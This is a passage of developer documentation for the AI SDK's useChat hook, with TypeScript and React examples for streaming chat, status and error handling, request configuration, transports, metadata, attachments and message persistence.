import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    system: 'You are a helpful assistant.',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.

Customized UI

useChat also provides ways to manage the chat message states via code, show status, and update messages without being triggered by user interactions.

Status

The useChat hook returns a status. It has the following possible values:

submitted: The message has been sent to the API and we're awaiting the start of the response stream.
streaming: The response is actively streaming in from the API, receiving chunks of data.
ready: The full response has been received and processed; a new user message can be submitted.
error: An error occurred during the API request, preventing successful completion.

You can use status for e.g. the following purposes:

To show a loading spinner while the chatbot is processing the user's message.
To show a "Stop" button to abort the current message.
To disable the submit button.

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Page() {
  const { messages, sendMessage, status, stop } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });
  const [input, setInput] = useState('');

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      {(status === 'submitted' || status === 'streaming') && (
        <div>
          {status === 'submitted' && <Spinner />}
          <button type="button" onClick={() => stop()}>
            Stop
          </button>
        </div>
      )}

      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          disabled={status !== 'ready'}
          placeholder="Say something..."
        />
        <button type="submit" disabled={status !== 'ready'}>
          Submit
        </button>
      </form>
    </>
  );
}

Error State

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, disable the submit button, or show a retry button:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Chat() {
  const { messages, sendMessage, error, regenerate } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });
  const [input, setInput] = useState('');

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}:{' '}
          {m.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      {error && (
        <>
          <div>An error occurred.</div>
          <button type="button" onClick={() => regenerate()}>
            Retry
          </button>
        </>
      )}

      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          disabled={error != null}
        />
      </form>
    </div>
  );
}

Please also see the error handling guide for more information.

Modify messages

Sometimes, you may want to directly modify some existing messages. For example, a delete button can be added to each message to allow users to remove them from the chat history.

The setMessages function can help you achieve these tasks:

const { messages, setMessages } = useChat()

const handleDelete = (id) => {
  setMessages(messages.filter(message => message.id !== id))
}

return <>
  {messages.map(message => (
    <div key={message.id}>
      {message.role === 'user' ? 'User: ' : 'AI: '}
      {message.parts.map((part, index) => (
        part.type === 'text' ? (
          <span key={index}>{part.text}</span>
        ) : null
      ))}
      <button onClick={() => handleDelete(message.id)}>Delete</button>
    </div>
  ))}
  ...

You can think of messages and setMessages as a pair of state and setState in React.

Cancellation and regeneration

It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useChat hook.

const { stop, status } = useChat()

return <>
  <button onClick={stop} disabled={!(status === 'streaming' || status === 'submitted')}>Stop</button>
  ...

When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your chatbot application.

Similarly, you can also request the AI provider to reprocess the last message by calling the regenerate function returned by the useChat hook:

const { regenerate, status } = useChat();

return (
  <>
    <button
      onClick={regenerate}
      disabled={!(status === 'ready' || status === 'error')}
    >
      Regenerate
    </button>
    ...
  </>
);

When the user clicks the "Regenerate" button, the AI provider will regenerate the last message and replace the current one correspondingly.

Throttling UI Updates

This feature is currently only available for React.

By default, the useChat hook will trigger a render every time a new chunk is received. You can throttle the UI updates with the experimental_throttle option.

const { messages, ... } = useChat({
  // Throttle the messages and data updates to 50ms:
  experimental_throttle: 50
})

Event Callbacks

useChat provides optional event callbacks that you can use to handle different stages of the chatbot lifecycle:

onFinish: Called when the assistant response is completed. The event includes the response message, all messages, and flags for abort, disconnect, and errors.
onError: Called when an error occurs during the fetch request.
onData: Called whenever a data part is received.

These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.

import { UIMessage } from 'ai';

const {
  /* ... */
} = useChat({
  onFinish: ({ message, messages, isAbort, isDisconnect, isError }) => {
    // use information to e.g. update other UI states
  },
  onError: error => {
    console.error('An error occurred:', error);
  },
  onData: data => {
    console.log('Received data part from server:', data);
  },
});

Request Configuration

Custom headers, body, and credentials

By default, the useChat hook sends a HTTP POST request to the /api/chat endpoint with the message list as the request body. You can customize the request in two ways:

Hook-Level Configuration (Applied to all requests)

You can configure transport-level options that will be applied to all requests made by the hook:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/custom-chat',
    headers: {
      Authorization: 'your_token',
    },
    body: {
      user_id: '123',
    },
    credentials: 'same-origin',
  }),
});

Dynamic Hook-Level Configuration

You can also provide functions that return configuration values. This is useful for authentication tokens that need to be refreshed, or for configuration that depends on runtime conditions:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/custom-chat',
    headers: () => ({
      Authorization: `Bearer ${getAuthToken()}`,
      'X-User-ID': getCurrentUserId(),
    }),
    body: () => ({
      sessionId: getCurrentSessionId(),
      preferences: getUserPreferences(),
    }),
    credentials: () => 'include',
  }),
});

Request-Level Configuration (Recommended)

// Pass options as the second parameter to sendMessage
sendMessage(
  { text: input },
  {
    headers: {
      Authorization: 'Bearer token123',
      'X-Custom-Header': 'custom-value',
    },
    body: {
      temperature: 0.7,
      max_tokens: 100,
      user_id: '123',
    },
    metadata: {
      userId: 'user123',
      sessionId: 'session456',
    },
  },
);

The request-level options are merged with hook-level options, with request-level options taking precedence. On your server side, you can handle the request with this additional information.

Setting custom body fields per request

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const { messages, sendMessage } = useChat();
  const [input, setInput] = useState('');

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}:{' '}
          {m.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      <form
        onSubmit={event => {
          event.preventDefault();
          if (input.trim()) {
            sendMessage(
              { text: input },
              {
                body: {
                  customKey: 'customValue',
                },
              },
            );
            setInput('');
          }
        }}
      >
        <input value={input} onChange={e => setInput(e.target.value)} />
      </form>
    </div>
  );
}

You can retrieve these custom fields on your server side by destructuring the request body:

export async function POST(req: Request) {
  // Extract additional information ("customKey") from the body of the request:
  const { messages, customKey }: { messages: UIMessage[]; customKey: string } =
    await req.json();
  //...
}

Message Metadata

You can attach custom metadata to messages for tracking information like timestamps, model details, and token usage.

// Server: Send metadata about the message
return result.toUIMessageStreamResponse({
  messageMetadata: ({ part }) => {
    if (part.type === 'start') {
      return {
        createdAt: Date.now(),
        model: 'gpt-5.1',
      };
    }

    if (part.type === 'finish') {
      return {
        totalTokens: part.totalUsage.totalTokens,
      };
    }
  },
});

// Client: Access metadata via message.metadata
{
  messages.map(message => (
    <div key={message.id}>
      {message.role}:{' '}
      {message.metadata?.createdAt &&
        new Date(message.metadata.createdAt).toLocaleTimeString()}
      {/* Render message content */}
      {message.parts.map((part, index) =>
        part.type === 'text' ? <span key={index}>{part.text}</span> : null,
      )}
      {/* Show token count if available */}
      {message.metadata?.totalTokens && (
        <span>{message.metadata.totalTokens} tokens</span>
      )}
    </div>
  ));
}

For complete examples with type safety and advanced use cases, see the Message Metadata documentation.

Transport Configuration

You can configure custom transport behavior using the transport option to customize how messages are sent to your API:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

export default function Chat() {
  const { messages, sendMessage } = useChat({
    id: 'my-chat',
    transport: new DefaultChatTransport({
      prepareSendMessagesRequest: ({ id, messages }) => {
        return {
          body: {
            id,
            message: messages[messages.length - 1],
          },
        };
      },
    }),
  });

  // ... rest of your component
}

The corresponding API route receives the custom request format:

export async function POST(req: Request) {
  const { id, message } = await req.json();

  // Load existing messages and add the new one
  const messages = await loadMessages(id);
  messages.push(message);

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Advanced: Trigger-based routing

For more complex scenarios like message regeneration, you can use trigger-based routing:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

export default function Chat() {
  const { messages, sendMessage, regenerate } = useChat({
    id: 'my-chat',
    transport: new DefaultChatTransport({
      prepareSendMessagesRequest: ({ id, messages, trigger, messageId }) => {
        if (trigger === 'submit-user-message') {
          return {
            body: {
              trigger: 'submit-user-message',
              id,
              message: messages[messages.length - 1],
              messageId,
            },
          };
        } else if (trigger === 'regenerate-assistant-message') {
          return {
            body: {
              trigger: 'regenerate-assistant-message',
              id,
              messageId,
            },
          };
        }
        throw new Error(`Unsupported trigger: ${trigger}`);
      },
    }),
  });

  // ... rest of your component
}

The corresponding API route would handle different triggers:

export async function POST(req: Request) {
  const { trigger, id, message, messageId } = await req.json();

  const chat = await readChat(id);
  let messages = chat.messages;

  if (trigger === 'submit-user-message') {
    // Handle new user message
    messages = [...messages, message];
  } else if (trigger === 'regenerate-assistant-message') {
    // Handle message regeneration - remove messages after messageId
    const messageIndex = messages.findIndex(m => m.id === messageId);
    if (messageIndex !== -1) {
      messages = messages.slice(0, messageIndex);
    }
  }

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

To learn more about building custom transports, refer to the Transport API documentation.

Direct Agent Transport

For scenarios where you want to communicate directly with an Agent without going through HTTP, you can use DirectChatTransport. This is useful for:

Server-side rendering scenarios
Testing without network
Single-process applications

import { useChat } from '@ai-sdk/react';
import { DirectChatTransport, ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: 'You are a helpful assistant.',
});

export default function Chat() {
  const { messages, sendMessage, status } = useChat({
    transport: new DirectChatTransport({ agent }),
  });

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      <button
        onClick={() => sendMessage({ text: 'Hello!' })}
        disabled={status !== 'ready'}
      >
        Send
      </button>
    </>
  );
}

The DirectChatTransport invokes the agent's stream() method directly, converting UI messages to model messages and streaming the response back as UI message chunks.

For more details, see the DirectChatTransport reference.

Controlling the response stream

With streamText, you can control how error messages and usage information are sent back to the client.

Error Messages

import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    onError: error => {
      if (error == null) {
        return 'unknown error';
      }

      if (typeof error === 'string') {
        return error;
      }

      if (error instanceof Error) {
        return error.message;
      }

      return JSON.stringify(error);
    },
  });
}

Usage Information

Track token consumption and resource usage with message metadata:

Define a custom metadata type with usage fields (optional, for type safety)
Attach usage data using messageMetadata in your response
Display usage metrics in your UI components

Usage data is attached as metadata to messages and becomes available once the model completes its response generation.

import { openai } from '@ai-sdk/openai';
import {
  convertToModelMessages,
  streamText,
  UIMessage,
  type LanguageModelUsage,
} from 'ai';
__PROVIDER_IMPORT__;

// Create a new metadata type (optional for type-safety)
type MyMetadata = {
  totalUsage: LanguageModelUsage;
};

// Create a new custom message type with your own metadata
export type MyUIMessage = UIMessage<MyMetadata>;

export async function POST(req: Request) {
  const { messages }: { messages: MyUIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    messageMetadata: ({ part }) => {
      // Send total usage when generation is finished
      if (part.type === 'finish') {
        return { totalUsage: part.totalUsage };
      }
    },
  });
}

Then, on the client, you can access the message-level metadata.

'use client';

import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from './api/chat/route';
import { DefaultChatTransport } from 'ai';

export default function Chat() {
  // Use custom message type defined on the server (optional for type-safety)
  const { messages } = useChat<MyUIMessage>({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(m => (
        <div key={m.id} className="whitespace-pre-wrap">
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.parts.map(part => {
            if (part.type === 'text') {
              return part.text;
            }
          })}
          {/* Render usage via metadata */}
          {m.metadata?.totalUsage && (
            <div>Total usage: {m.metadata?.totalUsage.totalTokens} tokens</div>
          )}
        </div>
      ))}
    </div>
  );
}

You can also access your metadata from the onFinish callback of useChat:

'use client';

import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from './api/chat/route';
import { DefaultChatTransport } from 'ai';

export default function Chat() {
  // Use custom message type defined on the server (optional for type-safety)
  const { messages } = useChat<MyUIMessage>({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
    onFinish: ({ message }) => {
      // Access message metadata via onFinish callback
      console.log(message.metadata?.totalUsage);
    },
  });
}

Text Streams

useChat can handle plain text streams by setting the streamProtocol option to text:

'use client';

import { useChat } from '@ai-sdk/react';
import { TextStreamChatTransport } from 'ai';

export default function Chat() {
  const { messages } = useChat({
    transport: new TextStreamChatTransport({
      api: '/api/chat',
    }),
  });

  return <>...</>;
}

This configuration also works with other backend servers that stream plain text. Check out the stream protocol guide for more information.

Reasoning

import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'deepseek/deepseek-r1',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

On the client side, you can access the reasoning parts of the message object.

Reasoning parts have a text property that contains the reasoning content.

messages.map(message => (
  <div key={message.id}>
    {message.role === 'user' ? 'User: ' : 'AI: '}
    {message.parts.map((part, index) => {
      // text parts:
      if (part.type === 'text') {
        return <div key={index}>{part.text}</div>;
      }

      // reasoning parts:
      if (part.type === 'reasoning') {
        return <pre key={index}>{part.text}</pre>;
      }
    })}
  </div>
));

Some models may also produce files as part of reasoning (e.g. images). These are available as reasoning-file parts (ReasoningFileUIPart) with mediaType and url properties, similar to regular file parts.

Sources

Some providers such as Perplexity and Google include sources in the response.

Currently sources are limited to web pages that ground the response. You can forward them to the client with the sendSources option:

import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'perplexity/sonar-pro',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    sendSources: true,
  });
}

messages.map(message => (
  <div key={message.id}>
    {message.role === 'user' ? 'User: ' : 'AI: '}

    {/* Render URL sources */}
    {message.parts
      .filter(part => part.type === 'source-url')
      .map(part => (
        <span key={`source-${part.id}`}>
          [
          <a href={part.url} target="_blank">
            {part.title ?? new URL(part.url).hostname}
          </a>
          ]
        </span>
      ))}

    {/* Render document sources */}
    {message.parts
      .filter(part => part.type === 'source-document')
      .map(part => (
        <span key={`source-${part.id}`}>
          [<span>{part.title ?? `Document ${part.id}`}</span>]
        </span>
      ))}
  </div>
));

Image Generation

messages.map(message => (
  <div key={message.id}>
    {message.role === 'user' ? 'User: ' : 'AI: '}
    {message.parts.map((part, index) => {
      if (part.type === 'text') {
        return <div key={index}>{part.text}</div>;
      } else if (part.type === 'file' && part.mediaType.startsWith('image/')) {
        return <img key={index} src={part.url} alt="Generated image" />;
      }
    })}
  </div>
));

Attachments

There are two ways to send files with a message: using a FileList object from file inputs or using an array of file objects.

FileList

'use client';

import { useChat } from '@ai-sdk/react';
import { useRef, useState } from 'react';

export default function Page() {
  const { messages, sendMessage, status } = useChat();

  const [input, setInput] = useState('');
  const [files, setFiles] = useState<FileList | undefined>(undefined);
  const fileInputRef = useRef<HTMLInputElement>(null);

  return (
    <div>
      <div>
        {messages.map(message => (
          <div key={message.id}>
            <div>{`${message.role}: `}</div>

            <div>
              {message.parts.map((part, index) => {
                if (part.type === 'text') {
                  return <span key={index}>{part.text}</span>;
                }

                if (
                  part.type === 'file' &&
                  part.mediaType?.startsWith('image/')
                ) {
                  return <img key={index} src={part.url} alt={part.filename} />;
                }

                return null;
              })}
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={event => {
          event.preventDefault();
          if (input.trim()) {
            sendMessage({
              text: input,
              files,
            });
            setInput('');
            setFiles(undefined);

            if (fileInputRef.current) {
              fileInputRef.current.value = '';
            }
          }
        }}
      >
        <input
          type="file"
          onChange={event => {
            if (event.target.files) {
              setFiles(event.target.files);
            }
          }}
          multiple
          ref={fileInputRef}
        />
        <input
          value={input}
          placeholder="Send message..."
          onChange={e => setInput(e.target.value)}
          disabled={status !== 'ready'}
        />
      </form>
    </div>
  );
}

File Objects

You can also send files as objects along with a message. This can be useful for sending pre-uploaded files or data URLs.

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { FileUIPart } from 'ai';

export default function Page() {
  const { messages, sendMessage, status } = useChat();

  const [input, setInput] = useState('');
  const [files] = useState<FileUIPart[]>([
    {
      type: 'file',
      filename: 'earth.png',
      mediaType: 'image/png',
      url: 'https://example.com/earth.png',
    },
    {
      type: 'file',
      filename: 'moon.png',
      mediaType: 'image/png',
      url: 'data:image/png;base64,iVBORw0KGgo...',
    },
  ]);

  return (
    <div>
      <div>
        {messages.map(message => (
          <div key={message.id}>
            <div>{`${message.role}: `}</div>

            <div>
              {message.parts.map((part, index) => {
                if (part.type === 'text') {
                  return <span key={index}>{part.text}</span>;
                }

                if (
                  part.type === 'file' &&
                  part.mediaType?.startsWith('image/')
                ) {
                  return <img key={index} src={part.url} alt={part.filename} />;
                }

                return null;
              })}
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={event => {
          event.preventDefault();
          if (input.trim()) {
            sendMessage({
              text: input,
              files,
            });
            setInput('');
          }
        }}
      >
        <input
          value={input}
          placeholder="Send message..."
          onChange={e => setInput(e.target.value)}
          disabled={status !== 'ready'}
        />
      </form>
    </div>
  );
}

Files generated as part of model reasoning are available as reasoning-file parts (ReasoningFileUIPart) with the same mediaType and url properties.

Type Inference for Tools

When working with tools in TypeScript, AI SDK UI provides type inference helpers to ensure type safety for your tool inputs and outputs.

InferUITool

The InferUITool type helper infers the input and output types of a single tool for use in UI messages:

import { InferUITool } from 'ai';
import { z } from 'zod';

const weatherTool = {
  description: 'Get the current weather',
  inputSchema: z.object({
    location: z.string().describe('The city and state'),
  }),
  execute: async ({ location }) => {
    return `The weather in ${location} is sunny.`;
  },
};

// Infer the types from the tool
type WeatherUITool = InferUITool<typeof weatherTool>;
// This creates a type with:
// {
//   input: { location: string };
//   output: string;
// }

InferUITools

The InferUITools type helper infers the input and output types of a ToolSet:

import { InferUITools, ToolSet } from 'ai';
import { z } from 'zod';

const tools = {
  weather: {
    description: 'Get the current weather',
    inputSchema: z.object({
      location: z.string().describe('The city and state'),
    }),
    execute: async ({ location }) => {
      return `The weather in ${location} is sunny.`;
    },
  },
  calculator: {
    description: 'Perform basic arithmetic',
    inputSchema: z.object({
      operation: z.enum(['add', 'subtract', 'multiply', 'divide']),
      a: z.number(),
      b: z.number(),
    }),
    execute: async ({ operation, a, b }) => {
      switch (operation) {
        case 'add':
          return a + b;
        case 'subtract':
          return a - b;
        case 'multiply':
          return a * b;
        case 'divide':
          return a / b;
      }
    },
  },
} satisfies ToolSet;

// Infer the types from the tool set
type MyUITools = InferUITools<typeof tools>;
// This creates a type with:
// {
//   weather: { input: { location: string }; output: string };
//   calculator: { input: { operation: 'add' | 'subtract' | 'multiply' | 'divide'; a: number; b: number }; output: number };
// }

Using Inferred Types

You can use these inferred types to create a custom UIMessage type and pass it to various AI SDK UI functions:

import { InferUITools, UIMessage, UIDataTypes } from 'ai';

type MyUITools = InferUITools<typeof tools>;
type MyUIMessage = UIMessage<never, UIDataTypes, MyUITools>;

Pass the custom type to useChat or createUIMessageStream:

import { useChat } from '@ai-sdk/react';
import { createUIMessageStream } from 'ai';
import type { MyUIMessage } from './types';

// With useChat
const { messages } = useChat<MyUIMessage>();

// With createUIMessageStream
const stream = createUIMessageStream<MyUIMessage>(/* ... */);

This provides full type safety for tool inputs and outputs on the client and server.

title: Chatbot Message Persistence description: Learn how to store and load chat messages in a chatbot.

Chatbot Message Persistence

Being able to store and load chat messages is crucial for most AI chatbots. In this guide, we'll show how to implement message persistence with useChat and streamText.

Starting a new chat

When the user navigates to the chat page without providing a chat ID, we need to create a new chat and redirect to the chat page with the new chat ID.

import { redirect } from 'next/navigation';
import { createChat } from '@util/chat-store';

export default async function Page() {
  const id = await createChat(); // create a new chat
  redirect(`/chat/${id}`); // redirect to chat page, see below
}

import { generateId } from 'ai';
import { existsSync, mkdirSync } from 'fs';
import { writeFile } from 'fs/promises';
import path from 'path';

export async function createChat(): Promise<string> {
  const id = generateId(); // generate a unique chat ID
  await writeFile(getChatFile(id), '[]'); // create an empty chat file
  return id;
}

function getChatFile(id: string): string {
  const chatDir = path.join(process.cwd(), '.chats');
  if (!existsSync(chatDir)) mkdirSync(chatDir, { recursive: true });
  return path.join(chatDir, `${id}.json`);
}

Loading an existing chat

When the user navigates to the chat page with a chat ID, we need to load the chat messages from storage.

The loadChat function in our file-based chat store is implemented as follows:

import { UIMessage } from 'ai';
import { readFile } from 'fs/promises';

export async function loadChat(id: string): Promise<UIMessage[]> {
  return JSON.parse(await readFile(getChatFile(id), 'utf8'));
}

// ... rest of the file

Validating messages on the server

When processing messages on the server that contain tool calls, custom metadata, or data parts, you should validate them using validateUIMessages before sending them to the model.

Validation with tools

When your messages include tool calls, validate them against your tool definitions:

import {
  convertToModelMessages,
  streamText,
  UIMessage,
  validateUIMessages,
  tool,
} from 'ai';
import { z } from 'zod';
import { loadChat, saveChat } from '@util/chat-store';
import { dataPartsSchema, metadataSchema } from '@util/schemas';

// Define your tools
const tools = {
  weather: tool({
    description: 'Get weather information',
    parameters: z.object({
      location: z.string(),
      units: z.enum(['celsius', 'fahrenheit']),
    }),
    execute: async ({ location, units }) => {
      /* tool implementation */
    },
  }),
  // other tools
};

export async function POST(req: Request) {
  const { message, id } = await req.json();

  // Load previous messages from database
  const previousMessages = await loadChat(id);

  // Append new message to previousMessages messages
  const messages = [...previousMessages, message];

  // Validate loaded messages against
  // tools, data parts schema, and metadata schema
  const validatedMessages = await validateUIMessages({
    messages,
    tools, // Ensures tool calls in messages match current schemas
    dataPartsSchema,
    metadataSchema,
  });

  const result = streamText({
    model: 'openai/gpt-5-mini',
    messages: convertToModelMessages(validatedMessages),
    tools,
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    onFinish: ({ messages }) => {
      saveChat({ chatId: id, messages });
    },
  });
}

Handling validation errors

Handle validation errors gracefully when messages from the database don't match current schemas:

import {
  convertToModelMessages,
  streamText,
  validateUIMessages,
  TypeValidationError,
} from 'ai';
import { type MyUIMessage } from '@/types';

export async function POST(req: Request) {
  const { message, id } = await req.json();

  // Load and validate messages from database
  let validatedMessages: MyUIMessage[];

  try {
    const previousMessages = await loadMessagesFromDB(id);
    validatedMessages = await validateUIMessages({
      // append the new message to the previous messages:
      messages: [...previousMessages, message],
      tools,
      metadataSchema,
    });
  } catch (error) {
    if (error instanceof TypeValidationError) {
      // Log validation error for monitoring
      console.error('Database messages validation failed:', error);
      // Could implement message migration or filtering here
      // For now, start with empty history
      validatedMessages = [];
    } else {
      throw error;
    }
  }

  // Continue with validated messages...
}

Displaying the chat

Once messages are loaded from storage, you can display them in your chat UI. Here's how to set up the page component and the chat display:

import { loadChat } from '@util/chat-store';
import Chat from '@ui/chat';

export default async function Page(props: { params: Promise<{ id: string }> }) {
  const { id } = await props.params;
  const messages = await loadChat(id);
  return <Chat id={id} initialMessages={messages} />;
}

The chat component uses the useChat hook to manage the conversation:

'use client';

import { UIMessage, useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Chat({
  id,
  initialMessages,
}: { id?: string | undefined; initialMessages?: UIMessage[] } = {}) {
  const [input, setInput] = useState('');
  const { sendMessage, messages } = useChat({
    id, // use the provided chat ID
    messages: initialMessages, // load initial messages
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  // simplified rendering code, extend as needed:
  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.parts
            .map(part => (part.type === 'text' ? part.text : ''))
            .join('')}
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          placeholder="Type a message..."
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

Storing messages

useChat sends the chat id and the messages to the backend.

When loading messages from storage that contain tools, metadata, or custom data parts, validate them using validateUIMessages before processing (see the validation section above).

Storing messages is done in the onFinish callback of the toUIMessageStreamResponse function. onFinish receives the complete messages including the new AI response as UIMessage[].

import { openai } from '@ai-sdk/openai';
import { saveChat } from '@util/chat-store';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages, chatId }: { messages: UIMessage[]; chatId: string } =
    await req.json();

  const result = streamText({
    model: 'openai/gpt-5-mini',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    onFinish: ({ messages }) => {
      saveChat({ chatId, messages });
    },
  });
}

The actual storage of the messages is done in the saveChat function, which in our file-based chat store is implemented as follows:

import { UIMessage } from 'ai';
import { writeFile } from 'fs/promises';

export async function saveChat({
  chatId,
  messages,
}: {
  chatId: string;
  messages: UIMessage[];
}): Promise<void> {
  const content = JSON.stringify(messages, null, 2);
  await writeFile(getChatFile(chatId), content);
}

// ... rest of the file

Message IDs

In addition to a chat ID, each message has an ID. You can use this message ID to e.g. manipulate individual messages.

Client-side vs Server-side ID Generation

By default, message IDs are generated client-side:

User message IDs are generated by the useChat hook on the client
AI response message IDs are generated by streamText on the server

Setting Up Server-side ID Generation

When implementing persistence, you have two options for generating server-side IDs:

Using generateMessageId in toUIMessageStreamResponse
Setting IDs in your start message part with createUIMessageStream

Option 1: Using `generateMessageId` in `toUIMessageStreamResponse`

You can control the ID format by providing ID generators using createIdGenerator():

import { createIdGenerator, streamText } from 'ai';

export async function POST(req: Request) {
  // ...
  const result = streamText({
    // ...
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    // Generate consistent server-side IDs for persistence:
    generateMessageId: createIdGenerator({
      prefix: 'msg',
      size: 16,
    }),
    onFinish: ({ messages }) => {
      saveChat({ chatId, messages });
    },
  });
}

Option 2: Setting IDs with `createUIMessageStream`

Alternatively, you can use createUIMessageStream to control the message ID by writing a start message part:

import {
  generateId,
  streamText,
  createUIMessageStream,
  createUIMessageStreamResponse,
} from 'ai';

export async function POST(req: Request) {
  const { messages, chatId } = await req.json();

  const stream = createUIMessageStream({
    execute: ({ writer }) => {
      // Write start message part with custom ID
      writer.write({
        type: 'start',
        messageId: generateId(), // Generate server-side ID for persistence
      });

      const result = streamText({
        model: 'openai/gpt-5-mini',
        messages: await convertToModelMessages(messages),
      });

      writer.merge(result.toUIMessageStream({ sendStart: false })); // omit start message part
    },
    originalMessages: messages,
    onFinish: ({ responseMessage }) => {
      // save your chat here
    },
  });

  return createUIMessageStreamResponse({ stream });
}

import { createIdGenerator } from 'ai';
import { useChat } from '@ai-sdk/react';

const { ... } = useChat({
  generateId: createIdGenerator({
    prefix: 'msgc',
    size: 16,
  }),
  // ...
});

Sending only the last message

To achieve this, you can provide a prepareSendMessagesRequest function to the transport. This function receives the messages and the chat ID, and returns the request body to be sent to the server.

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const {
  // ...
} = useChat({
  // ...
  transport: new DefaultChatTransport({
    api: '/api/chat',
    // only send the last message to the server:
    prepareSendMessagesRequest({ messages, id }) {
      return { body: { message: messages[messages.length - 1], id } };
    },
  }),
});

On the server, you can then load the previous messages and append the new message to the previous messages. If your messages contain tools, metadata, or custom data parts, you should validate them:

import { convertToModelMessages, UIMessage, validateUIMessages } from 'ai';
// import your tools and schemas

export async function POST(req: Request) {
  // get the last message from the client:
  const { message, id } = await req.json();

  // load the previous messages from the server:
  const previousMessages = await loadChat(id);

  // validate messages if they contain tools, metadata, or data parts:
  const validatedMessages = await validateUIMessages({
    // append the new message to the previous messages:
    messages: [...previousMessages, message],
    tools, // if using tools
    metadataSchema, // if using custom metadata
    dataSchemas, // if using custom data parts
  });

  const result = streamText({
    // ...
    messages: convertToModelMessages(validatedMessages),
  });

  return result.toUIMessageStreamResponse({
